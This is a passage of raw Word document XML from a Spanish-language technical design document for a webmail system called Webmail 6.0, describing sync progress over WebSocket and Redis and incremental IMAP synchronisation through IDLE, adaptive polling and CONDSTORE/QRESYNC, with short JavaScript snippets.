        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">único), maximizando el throughput de escritura.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="159"/>
    <w:bookmarkStart w:id="160" w:name="progreso-vía-websocket"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2.2 Progreso vía WebSocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Durante la sincronización inicial, el backend publica eventos de progreso a través de Redis Pub/Sub, que los servidores WebSocket retransmiten al cliente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Backend publica progreso</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">publish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`sync:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</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'PROGRESS'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mailbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'INBOX'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">processed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">50000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">percent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El frontend muestra una barra de progreso con el porcentaje completado y la carpeta actual. Si el usuario cierra el navegador, la sincronización continúa en el backend y reanuda la transmisión de progreso cuando el cliente se reconecta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El siguiente diagrama ilustra el flujo completo de sincronización, desde la conexión IMAP hasta la disponibilidad de datos para el usuario:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="160"/>
    <w:bookmarkEnd w:id="161"/>
    <w:bookmarkStart w:id="165" w:name="sincronización-incremental"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3 Sincronización Incremental</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez completada la sincronización inicial, Webmail 6.0 transiciona a un modo incremental que solo procesa cambios: correos nuevos, flags modificados (leído/destacado/basura) y mensajes eliminados. Este modo es crítico para la eficiencia a largo plazo: en un mailbox con 50.000 correos donde llegan 50 nuevos correos por día, la sincronización incremental procesa solo esos 50 correos en lugar de re-escanear todo el mailbox.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1218"/>
        <w:gridCol w:w="1015"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="2436"/>
        <w:gridCol w:w="1929"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estrategia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Latencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Complejidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compatibilidad servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uso en Webmail 6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IMAP IDLE (push)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 1 segundo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~85% servidores modernos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[63]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Primario: notificación inmediata de nuevos correos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Polling 30-60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">30-60 segundos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mínima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Universal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallback: servidores sin IDLE o conexiones inestables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CONDSTORE/QRESYNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 5 segundos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gmail, Cyrus, Dovecot 2.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Optimización: sincronización delta de flags y UIDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UID FETCH secuencial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proporcional a mailbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Universal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallback legacy: servidores sin extensiones modernas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="162" w:name="imap-idle-push-notificaciones-1s"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3.1 IMAP IDLE (push) → notificaciones &lt;1s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IMAP IDLE (RFC 2177) mantiene una conexión TCP persistente abierta donde el servidor IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">empuja</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una notificación al cliente inmediatamente cuando llega un nuevo mensaje, en lugar de requerir que el cliente pregunte periódicamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[62]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[63]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">imapflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gestiona IDLE automáticamente: abre la conexión IDLE en la carpeta seleccionada y reinicia el comando periódicamente antes del timeout del servidor mediante el parámetro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxIdleTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(configurado a 29 minutos, justo bajo el límite típico de 30 minutos de la mayoría de servidores)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[41]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'exists'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">async</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Nuevo mensaje detectado en la carpeta monitoreada</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> newUid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(newUid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid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flags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internalDate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envelope</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storeHeaderInMongo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(message)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>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publish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`notify:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</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'NEW_EMAIL'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> newUid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</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La limitación principal de IDLE es que la mayoría de servidores IMAP solo permiten IDLE en una carpeta a la vez. Webmail 6.0 prioriza la bandeja INBOX para IDLE y utiliza polling corto (30 segundos) para las demás carpetas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="162"/>
    <w:bookmarkStart w:id="163" w:name="polling-30-60s-fallback"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3.2 Polling 30-60s fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para servidores que no soportan IDLE (raros en 2026 pero aún presentes en entornos corporativos heredados) o cuando la conexión IDLE se interrumpe por timeouts de red intermedios, Webmail 6.0 recurre a polling con intervalo adaptativo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">INBOX: 30 segundos (máxima prioridad)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Drafts, Sent: 60 segundos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Carpetas de archivo/etiquetas: 300 segundos (5 minutos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El intervalo se ajusta dinámicamente: si un polling no detecta cambios en 3 ciclos consecutivos, el intervalo se duplica hasta un máximo de 5 minutos. Si se detectan cambios, el intervalo vuelve al valor base.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkStart w:id="164" w:name="X9903e0b328a60e26c7b2935d525f8da2c87d971"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.3.3 CONDSTORE/QRESYNC — solo UIDs nuevos y flags cambiados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para servidores que soportan extensiones modernas, Webmail 6.0 utiliza CONDSTORE (RFC 7162) y QRESYNC para sincronizaciones aún más eficientes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CONDSTORE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">asocia un número de modificación (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
